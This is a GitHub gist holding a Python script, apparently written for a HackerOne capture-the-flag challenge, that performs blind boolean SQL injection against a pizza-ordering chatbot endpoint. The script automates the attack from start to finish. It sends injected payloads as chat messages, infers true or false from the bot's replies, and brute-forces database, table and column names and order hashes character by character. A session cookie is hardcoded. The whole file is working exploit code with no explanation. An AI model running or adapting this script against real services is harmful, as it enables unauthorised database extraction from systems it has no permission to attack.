Skip to content

Instantly share code, notes, and snippets.

@ziot

ziot/pizzasqli.py Secret

Created Jul 31, 2020
Embed
What would you like to do?
import requests, json, time
session = "aaa812cc572b27f73a336ccaf85277f9"
def getChat():
url = "https://pizza.hacktivity.h1ctf.com/pizzabot?session={}&lastchat=0".format(session)
r = requests.get(url, headers = {
"Cookie": "session={}".format(session),
"X-Requested-With": "XMLHttpRequest"
})
data = json.loads(r.text)
msg = data[-1]["message"]
msg = msg.replace('<div><span class="talk-pizzabot">PizzaBot:</span> ', '').replace('</div>','')
return msg
def sendMsg(msg):
url = "https://pizza.hacktivity.h1ctf.com/pizzabot"
r = requests.post(url, headers = {
"Cookie": "session={}".format(session),
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest"
}, data = {
"session": session,
"message": msg
})
return r.text
def sendSqli(query):
# inject = "' or IF({},'true','false')='true".format(sqli)
# inject = "'+ifnull(({}),'0juv2f98')+'".format(sqli)
sendMsg('Order')
chatMsg = getChat()
time.sleep(0.5)
if "Sorry I don't recognise that order ID" in chatMsg:
sendMsg('Order')
else:
inject = "' or if(ifnull(({}),'1'),'1','0')='1".format(query)
result = sendMsg(inject)
sqliResult = getChat()
print sqliResult
if "Sorry I don't recognise that order ID" in sqliResult:
return True
elif "order is still out for delivery" in sqliResult:
return False
else:
print "unknown result: {}".format(sqliResult)
return True
'''
information_schema
h1pizza
order
delivered
hash
id
id = 1001
hash = aau5....
delivered = 0/1
'''
def getData():
tblName = ""
pos = 8
while True:
# charSetToUse = list("$_abcdefghijklmnopqrstuvwxyz0123456789")
# charSetToUse = list("0123456789")
# charSetToUse = list("$_.!@#$%^&*()+-=,.<>")
# charSetToUse = list("h1pizza")
charSetToUse = list("0123456789abcdefghijklmnopqrstuvwxyz")
for char in charSetToUse:
if char == "_":
char = "\_"
tmpTblName = tblName+char
# Get schema name:
# query = "select schema_name from information_schema.schemata where schema_name='information_schema' limit 1"
# query = "select schema_name from information_schema.schemata where schema_name not in('information_schema') and schema_name like 'h1pizza%' and substr(schema_name,"+str(pos)+",1) = '"+char+"' limit 1"
# Get table name:
# query = "select table_name from information_schema.tables where table_schema like 'h1pizza%' and table_name not in('') and lower(table_name) like '"+tmpTblName+"%' limit 1"
# query = "select length(table_name) from information_schema.tables where table_schema LIKE 'h1pizza%' and length(table_name) LIKE '"+tmpTblName+"' limit 1"
# get column names:
# query = "select column_name from information_schema.columns where table_schema like 'h1pizza%' and table_name='order' and column_name not in('delivered','hash','id') and lower(column_name) like '"+tmpTblName+"%' limit 1"
query = "select hash from h1pizza.order where delivered=1 and hash like '"+tmpTblName+"%' AND hash not in('ul2hamz1') limit 1"
print query
if(sendSqli(query)):
tblName = tblName+char
print tblName
pos+=1
break
getData()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.